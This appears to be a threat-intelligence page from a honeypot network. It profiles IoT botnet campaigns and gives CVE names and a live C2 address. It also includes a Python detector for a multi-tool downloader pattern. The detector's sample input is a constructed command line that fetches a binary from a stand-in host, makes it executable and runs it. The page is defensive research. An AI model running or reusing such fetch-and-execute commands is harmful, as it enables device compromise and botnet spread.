Campaign briefs and adversary profiles derived from the cowrAI distributed honeypot fleet — 36 nodes across 7 providers.
Three concurrent campaigns: the Flylegit 14-architecture IoT worm (t.me/flylegit) with active honeypot evasion and 0/72 VirusTotal detections; Frosty Mirai targeting Realtek, with live C2 confirmed across 14 sandbox detonations; and a Next.js Server Actions RSC prototype-pollution RCE scanner.
Opportunistic IoT DDoS botnet exploiting two SOAP RCE CVEs from 2014–2017 across Realtek and Huawei CPE devices. Campaign observed on all 36 fleet nodes over 31 days. Self-replication command-line arguments confirm the Mirai distribution-on-compromise lineage.
Active IoT botnet exploiting D-Link DSL-2750B HNAP command injection and Realtek miniigd UPnP SOAP RCE (CVE-2014-8361) across 9 architectures. Dual binary naming convention (kaizen.* / kwari.*) suggests split infrastructure or evolving rebranding. C2 confirmed at 185.234.100.154:2310 via sandbox detonation.
Mirai-lineage botnet with the widest architecture coverage observed on the fleet (11 or more architectures, including SPARC, SH4/Renesas, m68k, and PowerPC). SSH brute-force entry, then a four-fallback downloader (wget → busybox wget → curl → busybox curl) and dual-location persistence in /dev/shm and /var. The distribution path /bachekuni/ has not been seen in any other campaign on the fleet; no prior public reporting.
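The fallback downloader chain and the dual-location staging described above are easy to pattern-match in the input lines Cowrie records per session. The following is an added example, not cowrAI tooling or the campaign's own code: it splits a recorded shell line into sub-commands, notes which fetch tool each one used, and checks for the wget → busybox wget → curl → busybox curl order and for both /dev/shm and /var being touched. The sample lines, the 198.51.100.10 host and the x86 filename are constructed for the example; only the /bachekuni/ path comes from the brief.

```python
"""Flag the four-fallback downloader and /dev/shm + /var staging in a
Cowrie-style recorded command line. Added example, not cowrAI code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Fetch tools in the order the brief describes them being tried.
EXPECTED_CHAIN = ["wget", "busybox wget", "curl", "busybox curl"]
# Both staging directories named in the brief.
STAGE_DIRS = {"/dev/shm", "/var"}

# Optional path prefix, optional "busybox" applet prefix, then the tool name.
FETCH_RE = re.compile(r"^(?:/\S*/)?(busybox\s+)?(?:/\S*/)?(wget|curl)\b")
URL_RE = re.compile(r"(?:https?|tftp)://[^\s;|&'\"]+")
# A staging dir as a path root, not as a substring of a URL or another path.
DIR_RE = re.compile(r"(?<![\w/])(/dev/shm|/var)(?=/|\s|$)")


@dataclass
class Finding:
    fetchers: list[str] = field(default_factory=list)  # tools in the order tried
    urls: list[str] = field(default_factory=list)      # distinct download URLs
    stage_dirs: set[str] = field(default_factory=set)  # staging dirs touched

    @property
    def fallback_chain(self) -> bool:
        # True when all four tools appear as an in-order subsequence.
        remaining = iter(self.fetchers)
        return all(any(tool == want for tool in remaining) for want in EXPECTED_CHAIN)

    @property
    def dual_persistence(self) -> bool:
        return STAGE_DIRS <= self.stage_dirs


def split_commands(line: str) -> list[str]:
    # Cowrie logs the whole input line; break it on ;, &&, || and | boundaries.
    return [c.strip() for c in re.split(r"\|\||&&|;|\|", line) if c.strip()]


def analyze_line(line: str) -> Finding:
    finding = Finding()
    for cmd in split_commands(line):
        m = FETCH_RE.match(cmd)
        if m:
            tool = ("busybox " if m.group(1) else "") + m.group(2)
            finding.fetchers.append(tool)
            for url in URL_RE.findall(cmd):
                if url not in finding.urls:
                    finding.urls.append(url)
        finding.stage_dirs.update(DIR_RE.findall(cmd))
    return finding


def verdict(line: str) -> str:
    f = analyze_line(line)
    if f.fallback_chain and f.dual_persistence:
        return "match: four-fallback downloader with /dev/shm and /var staging"
    if f.fallback_chain or f.dual_persistence:
        return "partial: " + ("fallback chain" if f.fallback_chain else "dual staging")
    return "none"


# Constructed sample: host and filename are made up; /bachekuni/ is from the brief.
SAMPLE_LINE = (
    "cd /dev/shm || cd /var; "
    "wget http://198.51.100.10/bachekuni/x86 || "
    "busybox wget http://198.51.100.10/bachekuni/x86 || "
    "curl -O http://198.51.100.10/bachekuni/x86 || "
    "busybox curl -O http://198.51.100.10/bachekuni/x86; "
    "chmod +x x86; ./x86; cp x86 /var/.x86"
)
# Constructed benign line: a single fetch with no staging dirs.
BENIGN_LINE = "wget https://example.com/pkg.tar.gz && tar xzf pkg.tar.gz"

if __name__ == "__main__":
    for line in (SAMPLE_LINE, BENIGN_LINE):
        f = analyze_line(line)
        print(verdict(line), f.fetchers, f.urls, sorted(f.stage_dirs))
```

The order check is deliberately strict: a line that tries curl before wget still fetches, but it is not the chain this brief describes, so it reports as partial or none rather than a full match. Feed the function the `input` field from Cowrie's JSON log, one line at a time.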
Each brief is derived from live honeypot data collected by the cowrAI fleet: 36 Cowrie nodes running SSH, Telnet, and alternative-protocol lures (soaplure, httplure, adbhoney, and others). Every lure-captured payload is automatically submitted to VirusTotal and tria.ge; confirmed samples are detonated in an isolated WARP-egress sandbox for behavioral analysis.
Reports include: IOC tables, MITRE ATT&CK mappings, Suricata detection rules, raw exploit payload captures, and C2 infrastructure profiling. Distribution frequency: as-observed (one brief per distinct campaign or threat actor).